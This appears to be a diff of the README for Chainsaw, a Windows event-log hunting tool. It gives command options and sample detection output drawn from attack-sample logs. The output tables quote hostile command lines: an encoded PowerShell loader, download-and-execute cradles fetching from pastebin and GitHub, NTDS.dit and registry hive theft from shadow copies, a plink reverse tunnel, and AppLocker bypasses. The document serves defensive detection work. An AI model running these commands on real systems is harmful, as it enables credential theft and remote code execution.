OPTIONS: + --column-width Set the column width for the tabular output + --extension ... 
Only hunt through files with the provided extension + --from The timestamp to hunt from. Drops any documents older than the value provided + --kind ... Restrict loaded rules to specified kinds + --level ... Restrict loaded rules to specified levels + -m, --mapping ... A mapping file to tell Chainsaw how to use third-party rules + -o, --output The file/directory to output to + -r, --rule ... A path containing additional rules to hunt with + -s, --sigma ... A path containing Sigma rules to hunt with + --status ... Restrict loaded rules to specified statuses + --timezone Output the timestamp using the timezone provided + --to The timestamp to hunt up to. Drops any documents newer than the value provided + + ARGS: + The path to a collection of rules to use for hunting + ... The paths containing event logs to load and hunt through #### Command Examples -*Hunt through all event logs in a specific path, show additional information relating to potential lateral movement, and save results to individual CSV files* - -> % ./chainsaw hunt evtx_attack_samples --lateral-all --csv chainsaw_output + *Hunt through all evtx files using Sigma rules for detection logic* - ██████╗██╗ ██╗ █████╗ ██╗███╗ ██╗███████╗ █████╗ ██╗ ██╗ - ██╔════╝██║ ██║██╔══██╗██║████╗ ██║██╔════╝██╔══██╗██║ ██║ - ██║ ███████║███████║██║██╔██╗ ██║███████╗███████║██║ █╗ ██║ - ██║ ██╔══██║██╔══██║██║██║╚██╗██║╚════██║██╔══██║██║███╗██║ - ╚██████╗██║ ██║██║ ██║██║██║ ╚████║███████║██║ ██║╚███╔███╔╝ - ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝ ╚══╝╚══╝ - By F-Secure Countercept (@FranticTyping, @AlexKornitzer) + ./chainsaw hunt evtx_attack_samples/ -s sigma_rules/ --mapping mappings/sigma-event-logs.yml - [+] Found 268 EVTX files - [!] 
Continuing without detection rules, no path provided - [+] Hunting: [========================================] 268/268 + *Hunt through all evtx files using Sigma rules and Chainsaw rules for detection logic and output in CSV format to the results folder* + + ./chainsaw hunt evtx_attack_samples/ -s sigma_rules/ --mapping mappings/sigma-event-logs.yml -r rules/ --csv --output results + + *Hunt through all evtx files using Sigma rules for detection logic, only search between specific timestamps, and output the results in JSON format* - [+] Created security_audit_log_was_cleared.csv - [+] Created windows_defender_detections.csv - [+] Created system_log_was_cleared.csv - [+] Created new_user_created.csv - [+] Created user_added_to_interesting_group.csv - [+] Created 4624_logins.csv - - [+] 51 Detections found - -*Hunt through all event logs in a specific path, apply detection logic and TAU rules from the specified path* - - -> % ./chainsaw hunt evtx_attack_samples/ --rules sigma_rules/ --mapping mapping_files/sigma-mapping.yml - - ██████╗██╗ ██╗ █████╗ ██╗███╗ ██╗███████╗ █████╗ ██╗ ██╗ - ██╔════╝██║ ██║██╔══██╗██║████╗ ██║██╔════╝██╔══██╗██║ ██║ - ██║ ███████║███████║██║██╔██╗ ██║███████╗███████║██║ █╗ ██║ - ██║ ██╔══██║██╔══██║██║██║╚██╗██║╚════██║██╔══██║██║███╗██║ - ╚██████╗██║ ██║██║ ██║██║██║ ╚████║███████║██║ ██║╚███╔███╔╝ - ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝ ╚══╝╚══╝ - By F-Secure Countercept (Author: @FranticTyping) - - [+] Found 266 EVTX files - [+] Loaded 734 detection rules (74 were not loadeD) - [+] Printing results to screen - [+] Hunting: [========================================] 100% - - [+] Detection: Security audit log was cleared - ┌─────────────────────┬──────┬───────────────────────────────────┬─────────────────┐ - │ system_time │ id │ computer │ subject_user │ - ├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤ - │ 2019-01-20 07:00:50 │ 1102 │ "WIN-77LTAPHIQ1R.example.corp" │ "Administrator" │ - 
├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤ - │ 2019-01-20 07:29:57 │ 1102 │ "WIN-77LTAPHIQ1R.example.corp" │ "Administrator" │ - ├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤ - │ 2019-11-15 08:19:02 │ 1102 │ "alice.insecurebank.local" │ "bob" │ - ├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤ - │ 2020-07-22 20:29:27 │ 1102 │ "01566s-win16-ir.threebeesco.com" │ "a-jbrown" │ - ├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤ - │ 2020-09-02 11:47:39 │ 1102 │ "01566s-win16-ir.threebeesco.com" │ "a-jbrown" │ - ├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤ - │ 2020-09-15 18:04:36 │ 1102 │ "MSEDGEWIN10" │ "IEUser" │ - ├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤ - │ 2020-09-15 19:28:17 │ 1102 │ "01566s-win16-ir.threebeesco.com" │ "a-jbrown" │ - ├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤ - │ 2020-09-17 10:57:37 │ 1102 │ "01566s-win16-ir.threebeesco.com" │ "a-jbrown" │ - ├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤ - │ 2020-09-23 16:49:41 │ 1102 │ "01566s-win16-ir.threebeesco.com" │ "Administrator" │ - └─────────────────────┴──────┴───────────────────────────────────┴─────────────────┘ - - [+] Detection: Suspicious Command Line - ┌─────────────────────┬──────┬──────────────────────────────┬─────────────────────┬─────────────────────────────┬───────────────────────────────────┐ - │ system_time │ id │ detection_rules │ computer_name │ Event.EventData.CommandLine │ process_name │ - ├─────────────────────┼──────┼──────────────────────────────┼─────────────────────┼─────────────────────────────┼───────────────────────────────────┤ - │ 2019-02-13 18:03:28 │ 4688 │ ‣ Exfiltration and Tunneling │ "PC01.example.corp" │ │ C:\Users\user01\Desktop\plink.exe │ - │ │ │ Tools 
Execution │ │ │ │ - └─────────────────────┴──────┴──────────────────────────────┴─────────────────────┴─────────────────────────────┴───────────────────────────────────┘ - - [+] Detection: Suspicious Process Creation - ┌─────────────────────┬────┬──────────────────────────────────────────┬────────────────────────────────┬────────────────────────────────────────────────────┬────────────────────────────────────────────────────┐ - │ system_time │ id │ detection_rules │ computer_name │ Event.EventData.Image │ command_line │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-02-16 10:02:21 │ 1 │ ‣ Exfiltration and Tunneling │ "PC01.example.corp" │ C:\Users\IEUser\Desktop\plink.exe │ plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127 │ - │ │ │ Tools Execution │ │ │ .0.0.2:3389 -l test -pw test │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-03-17 20:18:09 │ 1 │ ‣ Netsh Port or Application │ "PC04.example.corp" │ C:\Windows\System32\netsh.exe │ netsh advfirewall firewall add rule name="Remote D │ - │ │ │ Allowed │ │ │ esktop" dir=in protocol=tcp localport=3389 profile │ - │ │ │ ‣ Netsh RDP Port Opening │ │ │ =any action=allow │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-03-17 20:20:17 │ 1 │ ‣ File or Folder Permissions │ "PC04.example.corp" │ C:\Windows\System32\icacls.exe │ "C:\Windows\System32\icacls.exe" C:\Windows\System │ - │ │ │ Modifications │ │ │ 32\termsrv.dll /grant %%username%%:F │ - 
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-03-17 20:20:17 │ 1 │ ‣ File or Folder Permissions │ "PC04.example.corp" │ C:\Windows\System32\icacls.exe │ "C:\Windows\System32\icacls.exe" C:\Windows\System │ - │ │ │ Modifications │ │ │ 32\termsrv.dll /grant *S-1-1-0:(F) │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-04-27 18:47:00 │ 1 │ ‣ Execution from Suspicious │ "IEWIN7" │ C:\Users\Public\KeeFarce.exe │ KeeFarce.exe │ - │ │ │ Folder │ │ │ │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-04-29 20:59:21 │ 1 │ ‣ Non Interactive PowerShell │ "IEWIN7" │ C:\Windows\System32\WindowsPowerShell\v1.0\powersh │ "C:\Windows\System32\WindowsPowerShell\v1.0\powers │ - │ │ │ │ │ ell.exe │ hell.exe" -s -NoLogo -NoProfile │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-04-29 20:59:22 │ 1 │ ‣ Local Accounts Discovery │ "IEWIN7" │ C:\Windows\System32\whoami.exe │ "C:\Windows\system32\whoami.exe" /all │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-04-30 07:46:15 │ 1 │ ‣ Meterpreter or Cobalt │ "IEWIN7" │ C:\Windows\System32\cmd.exe │ cmd.exe /c echo msdhch > \\.\pipe\msdhch │ - │ │ │ Strike Getsystem Service │ │ │ │ - │ 
│ │ Start │ │ │ │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-04-30 20:26:52 │ 1 │ ‣ Mimikatz Command Line │ "IEWIN7" │ C:\Windows\System32\cmd.exe │ C:\Windows\system32\cmd.exe /b /c start /b /min po │ - │ │ │ ‣ FromBase64String Command │ │ │ wershell.exe -nop -w hidden -noni -c "if([IntPtr]: │ - │ │ │ Line │ │ │ :Size -eq 4){$b='powershell.exe'}else{$b=$env:wind │ - │ │ │ ‣ Curl Start Combination │ │ │ ir+'\syswow64\WindowsPowerShell\v1.0\powershell.ex │ - │ │ │ │ │ │ e'};$s=New-Object System.Diagnostics.ProcessStartI │ - │ │ │ │ │ │ nfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hid │ - │ │ │ │ │ │ den -c &([scriptblock]::create((New-Object IO.Stre │ - │ │ │ │ │ │ amReader(New-Object IO.Compression.GzipStream((New │ - │ │ │ │ │ │ -Object IO.MemoryStream(,[Convert]::FromBase64Stri │ - │ │ │ │ │ │ ng(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVu │ - │ │ │ │ │ │ jVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7M │ - │ │ │ │ │ │ z33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5 │ - │ │ │ │ │ │ Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OS │ - │ │ │ │ │ │ TiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaM │ - │ │ │ │ │ │ irk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEn │ - │ │ │ │ │ │ tiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/ │ - │ │ │ │ │ │ Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrR │ - │ │ │ │ │ │ ItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/meb │ - │ │ │ │ │ │ DLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/ │ - │ │ │ │ │ │ O35y7GUVWdyP6kiEwOpsexgQCk7s8pg... 
│ - │ │ │ │ │ │ │ - │ │ │ │ │ │ (use --full to show all content) │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-04-30 20:26:52 │ 1 │ ‣ Mimikatz Command Line │ "IEWIN7" │ C:\Windows\System32\WindowsPowerShell\v1.0\powersh │ powershell.exe -nop -w hidden -noni -c "if([IntPtr │ - │ │ │ ‣ FromBase64String Command │ │ ell.exe │ ]::Size -eq 4){$b='powershell.exe'}else{$b=$env:wi │ - │ │ │ Line │ │ │ ndir+'\syswow64\WindowsPowerShell\v1.0\powershell. │ - │ │ │ ‣ Non Interactive PowerShell │ │ │ exe'};$s=New-Object System.Diagnostics.ProcessStar │ - │ │ │ │ │ │ tInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w h │ - │ │ │ │ │ │ idden -c &([scriptblock]::create((New-Object IO.St │ - │ │ │ │ │ │ reamReader(New-Object IO.Compression.GzipStream((N │ - │ │ │ │ │ │ ew-Object IO.MemoryStream(,[Convert]::FromBase64St │ - │ │ │ │ │ │ ring(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJ │ - │ │ │ │ │ │ VujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM │ - │ │ │ │ │ │ 7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQh │ - │ │ │ │ │ │ z5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9 │ - │ │ │ │ │ │ OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdF │ - │ │ │ │ │ │ aMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkv │ - │ │ │ │ │ │ EntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJv │ - │ │ │ │ │ │ U/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEiv │ - │ │ │ │ │ │ rRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/m │ - │ │ │ │ │ │ ebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz │ - │ │ │ │ │ │ 2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE │ - │ │ │ │ │ │ 0148Sosy+wCrl3Gbhx9ZapgqKfP+0Bd... 
│ - │ │ │ │ │ │ │ - │ │ │ │ │ │ (use --full to show all content) │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-19 15:11:26 │ 1 │ ‣ Shadow Copies Creation │ "MSEDGEWIN10" │ C:\Windows\System32\vssadmin.exe │ vssadmin.exe create shadow /for=C: │ - │ │ │ Using Operating Systems │ │ │ │ - │ │ │ Utilities │ │ │ │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-19 15:11:27 │ 1 │ ‣ Copying Sensitive Files │ "MSEDGEWIN10" │ C:\Windows\System32\cmd.exe │ "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALR │ - │ │ │ with Credential Data │ │ │ OOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ │ - │ │ │ │ │ │ NTDS.dit C:\Extract\ntds.dit" │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-19 15:11:27 │ 1 │ ‣ Copying Sensitive Files │ "MSEDGEWIN10" │ C:\Windows\System32\cmd.exe │ "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALR │ - │ │ │ with Credential Data │ │ │ OOT\Device\HarddiskVolumeShadowCopy1\Windows\Syste │ - │ │ │ │ │ │ m32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE" │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-26 07:39:14 │ 1 │ ‣ HH.exe Execution │ "MSEDGEWIN10" │ C:\Windows\hh.exe │ "C:\Windows\hh.exe" C:\Users\IEUser\Desktop\Fax Re │ - │ │ │ │ │ │ cord N104F.chm │ - 
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-26 07:39:14 │ 1 │ ‣ HTML Help Shell Spawn │ "MSEDGEWIN10" │ C:\Windows\System32\cmd.exe │ "C:\Windows\System32\cmd.exe" /c copy /Y C:\Window │ - │ │ │ ‣ Suspicious Rundll32 Activity │ │ │ s\system32\rundll32.exe %%TEMP%%\out.exe > nul && │ - │ │ │ │ │ │ %%TEMP%%\out.exe javascript:"\..\mshtml RunHTMLApp │ - │ │ │ │ │ │ lication ";document.write();h=new%%20ActiveXObject │ - │ │ │ │ │ │ ("WinHttp.WinHttpRequest.5.1");h.Open("GET","http: │ - │ │ │ │ │ │ //pastebin.com/raw/y2CjnRtH",false);try{h.Send();b │ - │ │ │ │ │ │ =h.ResponseText;eval(b);}catch(e){new%%20ActiveXOb │ - │ │ │ │ │ │ ject("WScript.Shell").Run("cmd /c taskkill /f /im │ - │ │ │ │ │ │ out.exe",0,true);} │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-29 21:11:17 │ 1 │ ‣ Suspicious Rundll32 Activity │ "MSEDGEWIN10" │ C:\Windows\System32\rundll32.exe │ "C:\Windows\system32\rundll32.exe" Shell32.dll,Con │ - │ │ │ │ │ │ trol_RunDLL "C:\Users\IEUser\Downloads\Invoice@058 │ - │ │ │ │ │ │ 2.cpl", │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-29 21:11:17 │ 1 │ ‣ Suspicious Call by Ordinal │ "MSEDGEWIN10" │ C:\Windows\SysWOW64\rundll32.exe │ "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\Sys │ - │ │ │ │ │ │ WOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\ │ - │ │ │ │ │ │ Invoice@0582.cpl", │ - 
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-29 21:32:58 │ 1 │ ‣ Suspicious Certutil Command │ "MSEDGEWIN10" │ C:\Windows\System32\cmd.exe │ cmd /c certutil -f -decode fi.b64 AllTheThings.dll │ - │ │ │ │ │ │ │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-29 21:32:59 │ 1 │ ‣ Suspicious Certutil Command │ "MSEDGEWIN10" │ C:\Windows\System32\certutil.exe │ certutil -f -decode fi.b64 AllTheThings.dll │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-29 21:33:03 │ 1 │ ‣ Bitsadmin Download │ "MSEDGEWIN10" │ C:\Windows\System32\bitsadmin.exe │ bitsadmin.exe /transfer "JobName" https://raw.gith │ - │ │ │ │ │ │ ubusercontent.com/op7ic/EDR-Testing-Script/master/ │ - │ │ │ │ │ │ Payloads/CradleTest.txt "C:\Windows\system32\Defau │ - │ │ │ │ │ │ lt_File_Path.ps1" │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-29 21:33:18 │ 1 │ ‣ Mshta JavaScript Execution │ "MSEDGEWIN10" │ C:\Windows\System32\mshta.exe │ mshta.exe javascript:a=GetObject("script:https://r │ - │ │ │ ‣ Suspicious Rundll32 Activity │ │ │ aw.githubusercontent.com/op7ic/EDR-Testing-Script/ │ - │ │ │ │ │ │ master/Payloads/Mshta_calc.sct").Exec();close(); │ - 
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-29 21:33:23 │ 1 │ ‣ Encoded PowerShell Command │ "MSEDGEWIN10" │ C:\Windows\System32\WindowsPowerShell\v1.0\powersh │ powershell -c "(New-Object Net.WebClient).Download │ - │ │ │ Line │ │ ell.exe │ File('https://raw.githubusercontent.com/op7ic/EDR- │ - │ │ │ ‣ Non Interactive PowerShell │ │ │ Testing-Script/master/Payloads/CradleTest.txt','De │ - │ │ │ │ │ │ fault_File_Path.ps1');IEX((-Join([IO.File]::ReadAl │ - │ │ │ │ │ │ lBytes('Default_File_Path.ps1')|ForEach-Object{[Ch │ - │ │ │ │ │ │ ar]$_})))" │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-29 21:33:28 │ 1 │ ‣ Possible Applocker Bypass │ "MSEDGEWIN10" │ C:\Windows\System32\cmd.exe │ cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.303 │ - │ │ │ │ │ │ 19\regsvcs.exe AllTheThings.dll │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-29 21:33:28 │ 1 │ ‣ Possible Applocker Bypass │ "MSEDGEWIN10" │ C:\Windows\System32\cmd.exe │ cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.507 │ - │ │ │ │ │ │ 27\regsvcs.exe AllTheThings.dll │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-29 21:33:29 │ 1 │ ‣ Possible Applocker Bypass │ "MSEDGEWIN10" │ C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegS │ C:\Windows\Microsoft.NET\Framework\v4.0.30319\regs │ - │ │ │ │ │ vcs.exe │ vcs.exe 
AllTheThings.dll │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-29 21:33:29 │ 1 │ ‣ Possible Applocker Bypass │ "MSEDGEWIN10" │ C:\Windows\System32\cmd.exe │ cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.5 │ - │ │ │ │ │ │ 0727\regsvcs.exe AllTheThings.dll │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-29 21:33:29 │ 1 │ ‣ Possible Applocker Bypass │ "MSEDGEWIN10" │ C:\Windows\System32\cmd.exe │ cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.3 │ - │ │ │ │ │ │ 0319\regsvcs.exe AllTheThings.dll │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-29 21:33:34 │ 1 │ ‣ Possible Applocker Bypass │ "MSEDGEWIN10" │ C:\Windows\System32\cmd.exe │ cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.507 │ - │ │ │ │ │ │ 27\regasm.exe /U AllTheThings.dll │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-12-04 22:41:04 │ 1 │ ‣ Suspicious Svchost Process │ "MSEDGEWIN10" │ C:\Windows\System32\svchost.exe │ C:\Windows\system32\svchost.exe -k localService -p │ - │ │ │ ‣ Windows Processes Suspicious │ │ │ -s RemoteRegistry │ - │ │ │ Parent Directory │ │ │ │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-12-09 16:52:34 │ 
1 │ ‣ Execution from Suspicious │ "MSEDGEWIN10" │ C:\Users\Public\psexecprivesc.exe │ "C:\Users\Public\psexecprivesc.exe" C:\Windows\Sys │ - │ │ │ Folder │ │ │ tem32\mspaint.exe │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-12-09 16:52:41 │ 1 │ ‣ PsExec Service Start │ "MSEDGEWIN10" │ C:\Windows\PSEXESVC.exe │ C:\Windows\PSEXESVC.exe │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2021-01-26 13:21:13 │ 1 │ ‣ Possible Applocker Bypass │ "LAPTOP-JU4M3I0E" │ C:\Program Files (x86)\Microsoft Visual Studio\201 │ C:\Program Files (x86)\Microsoft Visual Studio\201 │ - │ │ │ │ │ 9\Community\MSBuild\Current\Bin\MSBuild.exe │ 9\Community\MSBuild\Current\Bin\MSBuild.exe /nolog │ - │ │ │ │ │ │ o /nodemode:1 /nodeReuse:true /low:false │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2021-01-26 13:21:14 │ 1 │ ‣ Non Interactive PowerShell │ "LAPTOP-JU4M3I0E" │ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powersh │ powershell.exe start-process notepad.exe │ - │ │ │ │ │ ell.exe │ │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2021-04-20 20:32:55 │ 1 │ ‣ Non Interactive PowerShell │ "MSEDGEWIN10" │ C:\Windows\System32\WindowsPowerShell\v1.0\powersh │ "C:\Windows\System32\WindowsPowerShell\v1.0\powers │ - │ │ │ │ │ ell.exe │ hell.exe" -Version 5.1 -s -NoLogo -NoProfile │ - 
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2021-04-20 20:33:13 │ 1 │ ‣ Suspicious Svchost Process │ "MSEDGEWIN10" │ C:\Windows\System32\svchost.exe │ C:\Windows\system32\svchost.exe -k netsvcs -p -s g │ - │ │ │ ‣ Windows Processes Suspicious │ │ │ psvc │ - │ │ │ Parent Directory │ │ │ │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2021-04-20 20:33:14 │ 1 │ ‣ Suspicious Svchost Process │ "MSEDGEWIN10" │ C:\Windows\System32\svchost.exe │ C:\Windows\system32\svchost.exe -k LocalService -p │ - │ │ │ ‣ Windows Processes Suspicious │ │ │ -s fdPHost │ - │ │ │ Parent Directory │ │ │ │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2021-04-22 22:09:26 │ 1 │ ‣ Windows Processes Suspicious │ "MSEDGEWIN10" │ C:\Windows\System32\services.exe │ C:\Windows\system32\services.exe 652 "lsass.dmp" a │ - │ │ │ Parent Directory │ │ │ 708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2021-04-22 22:09:35 │ 1 │ ‣ Suspicious Svchost Process │ "MSEDGEWIN10" │ C:\Windows\System32\svchost.exe │ C:\Windows\system32\svchost.exe -k LocalService -p │ - │ │ │ ‣ Windows Processes Suspicious │ │ │ -s fdPHost │ - │ │ │ Parent Directory │ │ │ │ - 
└─────────────────────┴────┴──────────────────────────────────────────┴────────────────────────────────┴────────────────────────────────────────────────────┴────────────────────────────────────────────────────┘ - - [+] Detection: Suspicious File Creation - ┌─────────────────────┬────┬────────────────────────────────┬────────────────────────────┬────────────────────────────────────────────────────┬────────────────────────────────────────────────────┐ - │ system_time │ id │ detection_rules │ computer_name │ Event.EventData.TargetFilename │ image │ - ├─────────────────────┼────┼────────────────────────────────┼────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-05-14 14:04:05 │ 11 │ ‣ Hijack Legit RDP Session │ "alice.insecurebank.local" │ C:\Users\administrator\AppData\Roaming\Microsoft\W │ C:\Windows\system32\mstsc.exe │ - │ │ │ to Move Laterally │ │ indows\Start Menu\Programs\Startup\cmd.exe │ │ - ├─────────────────────┼────┼────────────────────────────────┼────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-19 14:45:31 │ 11 │ ‣ Startup Folder File Write │ "MSEDGEWIN10" │ C:\ProgramData\Microsoft\Windows\Start Menu\Progra │ C:\Windows\System32\WindowsPowerShell\v1.0\powersh │ - │ │ │ │ │ ms\StartUp\Notepad.lnk │ ell.exe │ - ├─────────────────────┼────┼────────────────────────────────┼────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-02-10 08:28:12 │ 11 │ ‣ Execution from Suspicious │ "MSEDGEWIN10" │ C:\Windows\System32\drivers\VBoxDrv.sys │ c:\Users\Public\BYOV\TDL\Furutaka.exe │ - │ │ │ Folder │ │ │ │ - 
